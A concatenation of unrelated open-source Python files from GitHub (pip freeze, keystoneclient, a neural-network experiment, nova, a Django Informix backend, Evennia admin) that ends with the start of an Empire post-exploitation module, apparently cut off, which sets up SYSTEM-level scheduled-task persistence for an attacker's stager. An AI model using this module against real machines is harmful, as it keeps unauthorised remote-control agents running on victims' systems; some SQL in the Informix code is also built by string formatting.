(skip_match and skip_match(line)) or
line.startswith((
'-r', '--requirement',
'-Z', '--always-unzip',
'-f', '--find-links',
'-i', '--index-url',
'--pre',
'--trusted-host',
'--process-dependency-links',
'--extra-index-url'))):
line = line.rstrip()
if line not in emitted_options:
emitted_options.add(line)
yield line
continue
if line.startswith('-e') or line.startswith('--editable'):
if line.startswith('-e'):
line = line[2:].strip()
else:
line = line[len('--editable'):].strip().lstrip('=')
line_req = install_req_from_editable(
line,
isolated=isolated,
wheel_cache=wheel_cache,
)
else:
line_req = install_req_from_line(
COMMENT_RE.sub('', line).strip(),
isolated=isolated,
wheel_cache=wheel_cache,
)
if not line_req.name:
logger.info(
"Skipping line in requirement file [%s] because "
"it's not clear what it would install: %s",
req_file_path, line.strip(),
)
logger.info(
" (add #egg=PackageName to the URL to avoid"
" this warning)"
)
else:
line_req_canonical_name = canonicalize_name(
line_req.name)
if line_req_canonical_name not in installations:
# either it's not installed, or it is installed
# but has been processed already
if not req_files[line_req.name]:
logger.warning(
"Requirement file [%s] contains %s, but "
"package %r is not installed",
req_file_path,
COMMENT_RE.sub('', line).strip(),
line_req.name
)
else:
req_files[line_req.name].append(req_file_path)
else:
yield str(installations[
line_req_canonical_name]).rstrip()
del installations[line_req_canonical_name]
req_files[line_req.name].append(req_file_path)
# Warn about requirements that were included multiple times (in a
# single requirements file or in different requirements files).
for name, files in six.iteritems(req_files):
if len(files) > 1:
logger.warning("Requirement %s included multiple times [%s]",
name, ', '.join(sorted(set(files))))
yield(
'## The following requirements were added by '
'pip freeze:'
)
for installation in sorted(
installations.values(), key=lambda x: x.name.lower()):
if installation.canonical_name not in skip:
yield str(installation).rstrip()
def get_requirement_info(dist):
# type: (Distribution) -> RequirementInfo
"""
Compute and return values (req, editable, comments) for use in
FrozenRequirement.from_dist().
"""
if not dist_is_editable(dist):
return (None, False, [])
location = os.path.normcase(os.path.abspath(dist.location))
from pip._internal.vcs import vcs, RemoteNotFoundError
vcs_backend = vcs.get_backend_for_dir(location)
if vcs_backend is None:
req = dist.as_requirement()
logger.debug(
'No VCS found for editable requirement "%s" in: %r', req,
location,
)
comments = [
'# Editable install with no version control ({})'.format(req)
]
return (location, True, comments)
try:
req = vcs_backend.get_src_requirement(location, dist.project_name)
except RemoteNotFoundError:
req = dist.as_requirement()
comments = [
'# Editable {} install with no remote ({})'.format(
type(vcs_backend).__name__, req,
)
]
return (location, True, comments)
except BadCommand:
logger.warning(
'cannot determine version of editable source in %s '
'(%s command not found in path)',
location,
vcs_backend.name,
)
return (None, True, [])
except InstallationError as exc:
logger.warning(
"Error when trying to get requirement for VCS system %s, "
"falling back to uneditable format", exc
)
else:
if req is not None:
return (req, True, [])
logger.warning(
'Could not determine repository location of %s', location
)
comments = ['## !! Could not determine repository location']
return (None, False, comments)
class FrozenRequirement(object):
def __init__(self, name, req, editable, comments=()):
# type: (str, Union[str, Requirement], bool, Iterable[str]) -> None
self.name = name
self.canonical_name = canonicalize_name(name)
self.req = req
self.editable = editable
self.comments = comments
@classmethod
def from_dist(cls, dist):
# type: (Distribution) -> FrozenRequirement
req, editable, comments = get_requirement_info(dist)
if req is None:
req = dist.as_requirement()
return cls(dist.project_name, req, editable, comments=comments)
def __str__(self):
req = self.req
if self.editable:
req = '-e %s' % req
return '\n'.join(list(self.comments) + [str(req)]) + '\n'
|
{
"content_hash": "8fa1c4f1e53bbee5e4688eecdfbdcef4",
"timestamp": "",
"source": "github",
"line_count": 261,
"max_line_length": 79,
"avg_line_length": 38.475095785440615,
"alnum_prop": 0.5140410276837284,
"repo_name": "kenxwagner/PythonPlay",
"id": "36a5c339a2ab22debec595af17a520a803f2a783",
"size": "10180",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "Project/webscrap/websc/Lib/site-packages/pip/_internal/operations/freeze.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "1502"
},
{
"name": "PowerShell",
"bytes": "1755"
},
{
"name": "Python",
"bytes": "2564579"
},
{
"name": "Shell",
"bytes": "3113"
}
],
"symlink_target": ""
}
|
from keystoneclient import base
from keystoneclient import exceptions
from keystoneclient.i18n import _
from keystoneclient.v3 import endpoints
from keystoneclient.v3 import projects
OS_EP_FILTER_EXT = 'OS-EP-FILTER'
class EndpointFilterManager(base.Manager):
"""Manager class for manipulating project-endpoint associations."""
def _build_base_url(self, project=None, endpoint=None):
project_id = base.getid(project)
endpoint_id = base.getid(endpoint)
if project_id and endpoint_id:
api_path = '/projects/%s/endpoints/%s' % (endpoint_id, project_id)
elif project_id:
api_path = '/projects/%s/endpoints' % (project_id)
elif endpoint_id:
api_path = '/endpoints/%s/projects' % (endpoint_id)
else:
msg = _('Must specify a project, an endpoint, or both')
raise exceptions.ValidationError(msg)
return '/' + OS_EP_FILTER_EXT + api_path
def add_endpoint_to_project(self, project, endpoint):
"""Create a project-endpoint association."""
if not (project and endpoint):
raise ValueError(_('project and endpoint are required'))
base_url = self._build_base_url(project=project,
endpoint=endpoint)
return super(EndpointFilterManager, self)._put(url=base_url)
def delete_endpoint_from_project(self, project, endpoint):
"""Remove a project-endpoint association."""
if not (project and endpoint):
raise ValueError(_('project and endpoint are required'))
base_url = self._build_base_url(project=project,
endpoint=endpoint)
return super(EndpointFilterManager, self)._delete(url=base_url)
def check_endpoint_in_project(self, project, endpoint):
"""Checks if project-endpoint association exist."""
if not (project and endpoint):
raise ValueError(_('project and endpoint are required'))
base_url = self._build_base_url(project=project,
endpoint=endpoint)
return super(EndpointFilterManager, self)._head(url=base_url)
def list_endpoints_for_project(self, project):
"""List all endpoints for a given project."""
if not project:
raise ValueError(_('project is required'))
base_url = self._build_base_url(project=project)
return super(EndpointFilterManager, self)._list(
base_url,
endpoints.EndpointManager.collection_key,
obj_class=endpoints.EndpointManager.resource_class)
def list_projects_for_endpoint(self, endpoint):
"""List all projects for a given endpoint."""
if not endpoint:
raise ValueError(_('endpoint is required'))
base_url = self._build_base_url(endpoint=endpoint)
return super(EndpointFilterManager, self)._list(
base_url,
projects.ProjectManager.collection_key,
obj_class=projects.ProjectManager.resource_class)
class EndpointGroupFilter(base.Resource):
pass
class EndpointGroupFilterManager(base.CrudManager):
"""Manager class for Endpoint Group Filters."""
resource_class = EndpointGroupFilter
collection_key = 'endpoint_groups'
key = 'endpoint_group'
base_url = OS_EP_FILTER_EXT
def create(self, name, description=None, filters=None, **kwargs):
filters = filters if filters else {}
return super(EndpointGroupFilterManager, self).create(
name=name,
description=description,
filters=filters,
**kwargs)
def get(self, endpoint_group):
return super(EndpointGroupFilterManager, self).get(
endpoint_group_id=base.getid(endpoint_group))
def update(self, endpoint_group, name=None, description=None, filters=None, **kwargs):
return super(EndpointGroupFilterManager, self).update(
endpoint_group_id=base.getid(endpoint_group),
name=name,
description=description,
filters=filters,
**kwargs)
def delete(self, endpoint_group):
return super(EndpointGroupFilterManager, self).delete(
endpoint_group_id=base.getid(endpoint_group))
def list(self, **kwargs):
base_url = self.base_url
return super(EndpointGroupFilterManager, self).list(base_url=base_url, **kwargs)
def _build_base_url(self, project=None, endpoint_group=None):
project_id = base.getid(project)
endpoint_group_id = base.getid(endpoint_group)
if project_id and endpoint_group_id:
api_path = '/endpoint_groups/{0}/projects/{1}'.format(endpoint_group_id,
project_id)
elif project_id:
api_path = '/projects/{0}/endpoint_groups'.format(project_id)
elif endpoint_group_id:
api_path = '/endpoint_groups/{0}/projects'.format(endpoint_group_id)
else:
msg = _('Must specify a project, an endpoint_group, or both')
raise exceptions.ValidationError(msg)
return '/' + OS_EP_FILTER_EXT + api_path
def add_endpoint_group_to_project(self, project, endpoint_group):
"""Create a project-endpoint_group association.
PUT /OS-EP-FILTER/endpoint_groups/{endpoint_group_id}/projects/{project_id}
"""
if not (project and endpoint_group):
raise ValueError(_('project and endpoint_group are required'))
base_url = self._build_base_url(project=project,
endpoint_group=endpoint_group)
return super(EndpointGroupFilterManager, self)._put(url=base_url)
def delete_endpoint_group_from_project(self, project, endpoint_group):
"""Remove a project-endpoint_group association.
DELETE /OS-EP-FILTER/endpoint_groups/{endpoint_group_id}/projects/{project_id}
"""
if not (project and endpoint_group):
raise ValueError(_('project and endpoint_group are required'))
base_url = self._build_base_url(project=project,
endpoint_group=endpoint_group)
return super(EndpointGroupFilterManager, self)._delete(url=base_url)
def check_endpoint_group_in_project(self, project, endpoint_group):
"""Checks if project-endpoint_group association exist.
HEAD /OS-EP-FILTER/endpoint_groups/{endpoint_group_id}/projects/{project_id}
"""
if not (project and endpoint_group):
raise ValueError(_('project and endpoint_group are required'))
base_url = self._build_base_url(project=project,
endpoint_group=endpoint_group)
return super(EndpointGroupFilterManager, self)._head(url=base_url)
def list_endpoint_groups_for_project(self, project):
"""List all endpoints for a given project.
GET /OS-EP-FILTER/projects/{project_id}/endpoint_groups
"""
if not project:
raise ValueError(_('project is required'))
base_url = self._build_base_url(project=project)
return super(EndpointGroupFilterManager, self)._list(
base_url,
self.collection_key,
obj_class=self.resource_class)
|
{
"content_hash": "df4cac7bcae79fa50ccc7935288863c5",
"timestamp": "",
"source": "github",
"line_count": 184,
"max_line_length": 90,
"avg_line_length": 40.108695652173914,
"alnum_prop": 0.6260162601626016,
"repo_name": "ging/python-keystoneclient",
"id": "04e97fa821af1899223821d855d5f7c73151cfe1",
"size": "7993",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "keystoneclient/v3/contrib/endpoint_filter.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "1480821"
},
{
"name": "Shell",
"bytes": "7148"
}
],
"symlink_target": ""
}
|
from __future__ import print_function, division
import matplotlib
import logging
from sys import stdout
matplotlib.use('Agg') # Must be before importing matplotlib.pyplot or pylab!
from neuralnilm import (Net, RealApplianceSource,
BLSTMLayer, DimshuffleLayer,
BidirectionalRecurrentLayer)
from neuralnilm.source import standardise, discretize, fdiff, power_and_fdiff
from neuralnilm.experiment import run_experiment, init_experiment
from neuralnilm.net import TrainingError
from neuralnilm.layers import MixtureDensityLayer
from neuralnilm.objectives import (scaled_cost, mdn_nll,
scaled_cost_ignore_inactive, ignore_inactive,
scaled_cost3)
from neuralnilm.plot import MDNPlotter
from lasagne.nonlinearities import sigmoid, rectify, tanh
from lasagne.objectives import mse
from lasagne.init import Uniform, Normal
from lasagne.layers import (LSTMLayer, DenseLayer, Conv1DLayer,
ReshapeLayer, FeaturePoolLayer, RecurrentLayer)
from lasagne.updates import nesterov_momentum, momentum
from functools import partial
import os
import __main__
from copy import deepcopy
from math import sqrt
import numpy as np
import theano.tensor as T
NAME = os.path.splitext(os.path.split(__main__.__file__)[1])[0]
PATH = "/homes/dk3810/workspace/python/neuralnilm/figures"
SAVE_PLOT_INTERVAL = 1000
GRADIENT_STEPS = 100
source_dict = dict(
filename='/data/dk3810/ukdale.h5',
appliances=[
['fridge freezer', 'fridge', 'freezer'],
# 'hair straighteners',
# 'television',
'dish washer',
['washer dryer', 'washing machine']
],
max_appliance_powers=[300, 2500, 2400],
on_power_thresholds=[5] * 5,
max_input_power=5900,
min_on_durations=[60, 1800, 1800],
min_off_durations=[12, 1800, 600],
window=("2013-06-01", "2014-07-01"),
seq_length=512,
output_one_appliance=False,
boolean_targets=False,
train_buildings=[1],
validation_buildings=[1],
skip_probability=0.7,
one_target_per_seq=False,
n_seq_per_batch=16,
subsample_target=2,
include_diff=False,
clip_appliance_power=True,
target_is_prediction=False,
# independently_center_inputs = True,
standardise_input=True,
unit_variance_targets=True,
input_padding=4,
lag=0
# reshape_target_to_2D=True,
# input_stats={'mean': np.array([ 0.05526326], dtype=np.float32),
# 'std': np.array([ 0.12636775], dtype=np.float32)},
# target_stats={
# 'mean': np.array([ 0.04066789, 0.01881946,
# 0.24639061, 0.17608672, 0.10273963],
# dtype=np.float32),
# 'std': np.array([ 0.11449792, 0.07338708,
# 0.26608968, 0.33463112, 0.21250485],
# dtype=np.float32)}
)
N = 50
net_dict = dict(
save_plot_interval=SAVE_PLOT_INTERVAL,
# loss_function=partial(ignore_inactive, loss_func=mdn_nll, seq_length=SEQ_LENGTH),
# loss_function=lambda x, t: mdn_nll(x, t).mean(),
loss_function=lambda x, t: mse(x, t).mean(),
# loss_function=partial(scaled_cost, loss_func=mse),
# loss_function=ignore_inactive,
# loss_function=partial(scaled_cost3, ignore_inactive=False),
updates_func=momentum,
learning_rate=1e-2,
learning_rate_changes_by_iteration={
250: 1e-3
# 500: 1e-3
# 4000: 1e-03,
# 6000: 5e-06,
# 7000: 1e-06
# 2000: 5e-06
# 3000: 1e-05
# 7000: 5e-06,
# 10000: 1e-06,
# 15000: 5e-07,
# 50000: 1e-07
},
do_save_activations=True,
auto_reshape=False
# plotter=MDNPlotter
)
"""
||||||||||
||||||||||
||||||||||
||||||||||
||||||||||
||||||||||
12345678901234567890
"""
def exp_a(name):
global source
# source_dict_copy = deepcopy(source_dict)
# source = RealApplianceSource(**source_dict_copy)
net_dict_copy = deepcopy(net_dict)
net_dict_copy.update(dict(
experiment_name=name,
source=source
))
N = 512
NUM_FILTERS = 10
net_dict_copy['layers_config'] = [
{
'type': DimshuffleLayer,
'pattern': (0, 2, 1) # (batch, features, time)
},
{
'type': Conv1DLayer, # convolve over the time axis
'num_filters': NUM_FILTERS,
'filter_length': 10,
'stride': 2,
'nonlinearity': rectify,
'W': Normal(std=1/sqrt(N))
},
{
'type': DimshuffleLayer,
'pattern': (0, 2, 1) # back to (batch, time, features)
},
{
'type': DenseLayer,
'num_units': N // 2,
'W': Normal(std=1/sqrt((N / 2) * NUM_FILTERS)),
'nonlinearity': rectify
},
{
'type': DenseLayer,
'num_units': N // 2,
'W': Normal(std=1/sqrt(N / 2)),
'nonlinearity': rectify
},
{
'type': DenseLayer,
'num_units': N // 2,
'W': Normal(std=1/sqrt(N / 2)),
'nonlinearity': rectify
},
{
'type': ReshapeLayer,
'shape': (source.n_seq_per_batch * (source.seq_length // 2),
source.n_inputs)
},
{
'type': DenseLayer,
'num_units': source.n_outputs,
'W': Normal(std=1/sqrt(N / 2)),
'nonlinearity': T.nnet.softplus
}
]
net = Net(**net_dict_copy)
return net
def main():
# EXPERIMENTS = list('abcdefghijklmnopqrstuvwxyz')
EXPERIMENTS = list('a')
for experiment in EXPERIMENTS:
full_exp_name = NAME + experiment
func_call = init_experiment(PATH, experiment, full_exp_name)
logger = logging.getLogger(full_exp_name)
try:
net = eval(func_call)
run_experiment(net, epochs=None)
except KeyboardInterrupt:
logger.info("KeyboardInterrupt")
break
except Exception as exception:
logger.exception("Exception")
raise
finally:
logging.shutdown()
if __name__ == "__main__":
main()
|
{
"content_hash": "c40dbdd7d4cca0d1310cde5431bbc3ba",
"timestamp": "",
"source": "github",
"line_count": 204,
"max_line_length": 86,
"avg_line_length": 30.965686274509803,
"alnum_prop": 0.5662498021212601,
"repo_name": "mmottahedi/neuralnilm_prototype",
"id": "32a34bb0c1fb3838f3a616d6f8b0e1c7f5534a1c",
"size": "6317",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "scripts/e339.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "4536723"
}
],
"symlink_target": ""
}
|
from nova.openstack.common import importutils
from nova.openstack.common import log as logging
LOG = logging.getLogger(__name__)
class VFS(object):
@staticmethod
def instance_for_image(imgfile, imgfmt, partition):
LOG.debug(_("Instance for image imgfile=%(imgfile)s "
"imgfmt=%(imgfmt)s partition=%(partition)s"),
{'imgfile': imgfile, 'imgfmt': imgfmt,
'partition': partition})
hasGuestfs = False
try:
LOG.debug(_("Trying to import guestfs"))
importutils.import_module("guestfs")
hasGuestfs = True
except Exception:
pass
if hasGuestfs:
LOG.debug(_("Using primary VFSGuestFS"))
return importutils.import_object(
"nova.virt.disk.vfs.guestfs.VFSGuestFS",
imgfile, imgfmt, partition)
else:
LOG.debug(_("Falling back to VFSLocalFS"))
return importutils.import_object(
"nova.virt.disk.vfs.localfs.VFSLocalFS",
imgfile, imgfmt, partition)
"""
The VFS class defines an interface for manipulating files within
a virtual disk image filesystem. This allows file injection code
to avoid the assumption that the virtual disk image can be mounted
in the host filesystem.
All paths provided to the APIs in this class should be relative
to the root of the virtual disk image filesystem. Subclasses
will translate paths as required by their implementation.
"""
def __init__(self, imgfile, imgfmt, partition):
self.imgfile = imgfile
self.imgfmt = imgfmt
self.partition = partition
"""
Perform any one-time setup tasks to make the virtual
filesystem available to future API calls
"""
def setup(self):
pass
"""
Release all resources initialized in the setup method
"""
def teardown(self):
pass
"""
Create a directory @path, including all intermedia
path components if they do not already exist
"""
def make_path(self, path):
pass
"""
Append @content to the end of the file identified
by @path, creating the file if it does not already
exist
"""
def append_file(self, path, content):
pass
"""
Replace the entire contents of the file identified
by @path, with @content, creating the file if it does
not already exist
"""
def replace_file(self, path, content):
pass
"""
Return the entire contents of the file identified
by @path
"""
def read_file(self, path):
pass
"""
Return a True if the file identified by @path
exists
"""
def has_file(self, path):
pass
"""
Set the permissions on the file identified by
@path to @mode. The file must exist prior to
this call.
"""
def set_permissions(self, path, mode):
pass
"""
Set the ownership on the file identified by
@path to the username @user and groupname @group.
Either of @user or @group may be None, in which case
the current ownership will be left unchanged. The
ownership must be passed in string form, allowing
subclasses to translate to uid/gid form as required.
The file must exist prior to this call.
"""
def set_ownership(self, path, user, group):
pass
|
{
"content_hash": "ca969908e52b6222332c195bf49d763f",
"timestamp": "",
"source": "github",
"line_count": 117,
"max_line_length": 70,
"avg_line_length": 29.213675213675213,
"alnum_prop": 0.6208308952603862,
"repo_name": "qwefi/nova",
"id": "b6cff39fb6c657668418cdeced65cd849333bbee",
"size": "4037",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "nova/virt/disk/vfs/api.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "11596912"
},
{
"name": "Shell",
"bytes": "17148"
}
],
"symlink_target": ""
}
|
from django.db.backends.base.introspection import BaseDatabaseIntrospection, FieldInfo
#from the JDBC Informix driver
SQ_TYPE_BYTE = 11
SQ_TYPE_CHAR = 0
SQ_TYPE_DATE = 7
SQ_TYPE_DATETIME = 10
SQ_TYPE_REAL = 4
SQ_TYPE_SMFLOAT = 4
SQ_TYPE_DECIMAL = 5
SQ_TYPE_NUMERIC = 5
SQ_TYPE_FLOAT = 3
SQ_TYPE_DOUBLE = 3
SQ_TYPE_INTEGER = 2
SQ_TYPE_MONEY = 8
SQ_TYPE_INTERVAL = 14
SQ_TYPE_SERIAL = 6
SQ_TYPE_SMALLINT = 1
SQ_TYPE_TEXT = 12
SQ_TYPE_VARCHAR = 13
SQ_TYPE_MASK = 31
class DatabaseIntrospection(BaseDatabaseIntrospection):
# Map type codes to Django Field types.
data_types_reverse = {
SQ_TYPE_BYTE: 'BinaryField',
SQ_TYPE_CHAR: 'CharField',
SQ_TYPE_DATE: 'DateField',
SQ_TYPE_DATETIME: 'DateTimeField',
SQ_TYPE_REAL: 'FloatField',
SQ_TYPE_SMFLOAT: 'FloatField',
SQ_TYPE_DECIMAL: 'DecimalField',
SQ_TYPE_NUMERIC: 'DecimalField',
SQ_TYPE_FLOAT: 'FloatField',
SQ_TYPE_DOUBLE: 'FloatField',
SQ_TYPE_INTEGER: 'IntegerField',
SQ_TYPE_MONEY: '??',
SQ_TYPE_INTERVAL: '??',
SQ_TYPE_SERIAL: 'AutoField',
SQ_TYPE_SMALLINT: 'SmallIntegerField',
SQ_TYPE_TEXT: 'TextField',
SQ_TYPE_VARCHAR: 'CharField',
SQ_TYPE_MASK: '??',
}
def get_table_list(self, cursor):
cursor.execute('SELECT tabname FROM systables')
return [x[0] for x in cursor.fetchall()]
def get_table_description(self, cursor, table_name, identity_check=True):
cursor.execute("SELECT c.* FROM syscolumns c, systables t WHERE c.tabid=t.tabid and tabname='%s'" % table_name)
columns = [[c[0],c[3] % 256,None,c[4],c[4],None,0 if c[3] > 256 else 1] for c in cursor.fetchall()]
items = []
for column in columns:
if column[1] in [SQ_TYPE_NUMERIC, SQ_TYPE_DECIMAL]:
column[4] = int(column[3]/256)
column[5] = column[3] - column[4]*256
items.append(FieldInfo(*column))
return items
def get_key_columns(self, cursor, table_name):
relations = []
cursor.execute("""
SELECT col1.colname as column_name, t2.tabname, col2.colname as referenced_column
FROM syscolumns col1, sysindexes idx1, sysconstraints const1, systables t1, syscolumns col2,
sysindexes idx2, sysconstraints const2, sysreferences ref, systables t2
WHERE col1.tabid=idx1.tabid
AND col1.colno=idx1.part1
AND idx1.idxname=const1.idxname
AND const1.tabid=t1.tabid
AND const1.constrtype='R'
AND col2.tabid=idx2.tabid
AND col2.colno=idx2.part1
AND idx2.idxname=const2.idxname
AND const2.constrid=ref.primary
AND ref.constrid = const1.constrid
AND t2.tabid=idx2.tabid
AND t1.tabname = '%s'
""" % table_name)
relations.extend(cursor.fetchall())
return relations
def get_indexes(self, cursor, table_name):
""" This query retrieves each index on the given table, including the
first associated field name """
cursor.execute("""select c1.colname, i1.idxtype,
(select constrtype from sysconstraints where idxname=i1.idxname) as pkey
FROM sysindexes i1, syscolumns c1
WHERE i1.tabid=c1.tabid AND i1.part1=c1.colno
AND i1.part2 = 0 and i1.tabid = (select tabid from systables where tabname='%s')""" % table_name)
indexes = {}
for row in cursor.fetchall():
indexes[row[0]] = {
'primary_key': True if row[2] == 'P' else False,
'unique': True if row[1] == 'U' else False
}
return indexes
def __get_col_index(self, cursor, schema, table_name, col_name):
"""Private method. Getting Index position of column by its name"""
cursor.execute("""SELECT colno
FROM syscolumns
WHERE colname='%s'
AND tabid=(SELECT tabid FROM systables
WHERE tabname='%s')""" %(col_name, table_name))
return(int(cursor.fetchone()[0]) - 1)
def get_relations(self, cursor, table_name):
"""
Returns a dictionary of {field_index: (field_index_other_table, other_table)}
representing all relationships to the given table. Indexes are 0-based.
"""
relations = {}
kc_relations = self.get_key_columns(cursor, table_name)
for rel in kc_relations:
row0 = self.__get_col_index(cursor, None, table_name, rel[0])
row1 = self.__get_col_index(cursor, None, rel[1], rel[2])
row2 = rel[1]
relations[row0] = (row1, row2)
return relations
#TODO: Just copied
def get_constraints(self, cursor, table_name):
constraints = {}
schema = cursor.connection.get_current_schema()
sql = "SELECT CONSTNAME, COLNAME FROM SYSCAT.COLCHECKS WHERE TABSCHEMA='%(schema)s' AND TABNAME='%(table)s'" % {'schema': schema.upper(), 'table': table_name.upper()}
cursor.execute(sql)
for constname, colname in cursor.fetchall():
if constname not in constraints:
constraints[constname] = {
'columns': [],
'primary_key': False,
'unique': False,
'foreign_key': None,
'check': True,
'index': False
}
constraints[constname]['columns'].append(colname.lower())
sql = "SELECT KEYCOL.CONSTNAME, KEYCOL.COLNAME FROM SYSCAT.KEYCOLUSE KEYCOL INNER JOIN SYSCAT.TABCONST TABCONST ON KEYCOL.CONSTNAME=TABCONST.CONSTNAME WHERE TABCONST.TABSCHEMA='%(schema)s' and TABCONST.TABNAME='%(table)s' and TABCONST.TYPE='U'" % {'schema': schema.upper(), 'table': table_name.upper()}
cursor.execute(sql)
for constname, colname in cursor.fetchall():
if constname not in constraints:
constraints[constname] = {
'columns': [],
'primary_key': False,
'unique': True,
'foreign_key': None,
'check': False,
'index': True
}
constraints[constname]['columns'].append(colname.lower())
for pkey in cursor.connection.primary_keys(None, schema, table_name):
if pkey['PK_NAME'] not in constraints:
constraints[pkey['PK_NAME']] = {
'columns': [],
'primary_key': True,
'unique': False,
'foreign_key': None,
'check': False,
'index': True
}
constraints[pkey['PK_NAME']]['columns'].append(pkey['COLUMN_NAME'].lower())
for fk in cursor.connection.foreign_keys( True, schema, table_name ):
if fk['FK_NAME'] not in constraints:
constraints[fk['FK_NAME']] = {
'columns': [],
'primary_key': False,
'unique': False,
'foreign_key': (fk['PKTABLE_NAME'].lower(), fk['PKCOLUMN_NAME'].lower()),
'check': False,
'index': False
}
constraints[fk['FK_NAME']]['columns'].append(fk['FKCOLUMN_NAME'].lower())
if fk['PKCOLUMN_NAME'].lower() not in constraints[fk['FK_NAME']]['foreign_key']:
fkeylist = list(constraints[fk['FK_NAME']]['foreign_key'])
fkeylist.append(fk['PKCOLUMN_NAME'].lower())
constraints[fk['FK_NAME']]['foreign_key'] = tuple(fkeylist)
for index in cursor.connection.indexes( True, schema, table_name ):
if index['INDEX_NAME'] not in constraints:
constraints[index['INDEX_NAME']] = {
'columns': [],
'primary_key': False,
'unique': False,
'foreign_key': None,
'check': False,
'index': True
}
elif constraints[index['INDEX_NAME']]['unique'] :
continue
elif constraints[index['INDEX_NAME']]['primary_key']:
continue
constraints[index['INDEX_NAME']]['columns'].append(index['COLUMN_NAME'].lower())
return constraints
|
{
"content_hash": "fe08bdba2cf15924da51d86ebfc877ef",
"timestamp": "",
"source": "github",
"line_count": 200,
"max_line_length": 310,
"avg_line_length": 42.79,
"alnum_prop": 0.5493105865856509,
"repo_name": "nutztherookie/django-informix",
"id": "0b16b0a2389af5a822286ec6c364d1cece055ba9",
"size": "8558",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/django_informix/introspection.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "20929"
}
],
"symlink_target": ""
}
|
"""
This defines how to edit help entries in Admin.
"""
from django import forms
from django.contrib import admin
from evennia.help.models import HelpEntry
class HelpEntryForm(forms.ModelForm):
"Defines how to display the help entry"
class Meta:
model = HelpEntry
fields = '__all__'
db_help_category = forms.CharField(label="Help category", initial='General',
help_text="organizes help entries in lists")
db_lock_storage = forms.CharField(label="Locks", initial='view:all()',required=False,
widget=forms.TextInput(attrs={'size':'40'}),)
class HelpEntryAdmin(admin.ModelAdmin):
"Sets up the admin manaager for help entries"
list_display = ('id', 'db_key', 'db_help_category', 'db_lock_storage')
list_display_links = ('id', 'db_key')
search_fields = ['^db_key', 'db_entrytext']
ordering = ['db_help_category', 'db_key']
save_as = True
save_on_top = True
list_select_related = True
form = HelpEntryForm
fieldsets = (
(None, {'fields':(('db_key', 'db_help_category'),
'db_entrytext', 'db_lock_storage'),
'description':"Sets a Help entry. Set lock to <i>view:all()</I> unless you want to restrict it."}),)
admin.site.register(HelpEntry, HelpEntryAdmin)
|
{
"content_hash": "086e5c70001072750bb372ac533c0505",
"timestamp": "",
"source": "github",
"line_count": 39,
"max_line_length": 116,
"avg_line_length": 34.794871794871796,
"alnum_prop": 0.6123802505526897,
"repo_name": "emergebtc/muddery",
"id": "cffc14784d03c0166b846f971539d106af4f6c9b",
"size": "1357",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "evennia/evennia/help/admin.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "38409"
},
{
"name": "Emacs Lisp",
"bytes": "2734"
},
{
"name": "HTML",
"bytes": "36949"
},
{
"name": "JavaScript",
"bytes": "143672"
},
{
"name": "Python",
"bytes": "2319628"
}
],
"symlink_target": ""
}
|
import os
from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Invoke-Schtasks',
'Author': ['@mattifestation', '@harmj0y'],
'Description': ('Persist a stager (or script) using schtasks running as SYSTEM. This has a moderate detection/removal rating.'),
'Background' : False,
'OutputExtension' : None,
'NeedsAdmin' : True,
'OpsecSafe' : False,
'Language' : 'powershell',
'MinLanguageVersion' : '2',
'Comments': [
'https://github.com/mattifestation/PowerSploit/blob/master/Persistence/Persistence.psm1'
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
},
'Listener' : {
'Description' : 'Listener to use.',
'Required' : False,
'Value' : ''
},
'DailyTime' : {
'Description' : 'Daily time to trigger the script (HH:mm).',
'Required' : False,
'Value' : '09:00'
},
'IdleTime' : {
'Description' : 'User idle time (in minutes) to trigger script.',
'Required' : False,
'Value' : ''
},
'OnLogon' : {
'Description' : 'Switch. Trigger script on user logon.',
'Required' : False,
'Value' : ''
},
'TaskName' : {
'Description' : 'Name to use for the schtask.',
'Required' : True,
'Value' : 'Updater'
},
'RegPath' : {
'Description' : 'Registry location to store the script code. Last element is the key name.',
'Required' : False,
'Value' : 'HKLM:\Software\Microsoft\Network\debug'
},
'ADSPath' : {
'Description' : 'Alternate-data-stream location to store the script code.',
'Required' : False,
'Value' : ''
},
'ExtFile' : {
'Description' : 'Use an external file for the payload instead of a stager.',
'Required' : False,
'Value' : ''
},
'Cleanup' : {
'Description' : 'Switch. Cleanup the trigger and any script from specified location.',
'Required' : False,
'Value' : ''
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'Proxy' : {
'Description' : 'Proxy to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'ProxyCreds' : {
'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
listenerName = self.options['Listener']['Value']
# trigger options
dailyTime = self.options['DailyTime']['Value']
idleTime = self.options['IdleTime']['Value']
onLogon = self.options['OnLogon']['Value']
taskName = self.options['TaskName']['Value']
# storage options
regPath = self.options['RegPath']['Value']
adsPath = self.options['ADSPath']['Value']
# management options
extFile = self.options['ExtFile']['Value']
cleanup = self.options['Cleanup']['Value']
# staging options
userAgent = self.options['UserAgent']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
statusMsg = ""
locationString = ""
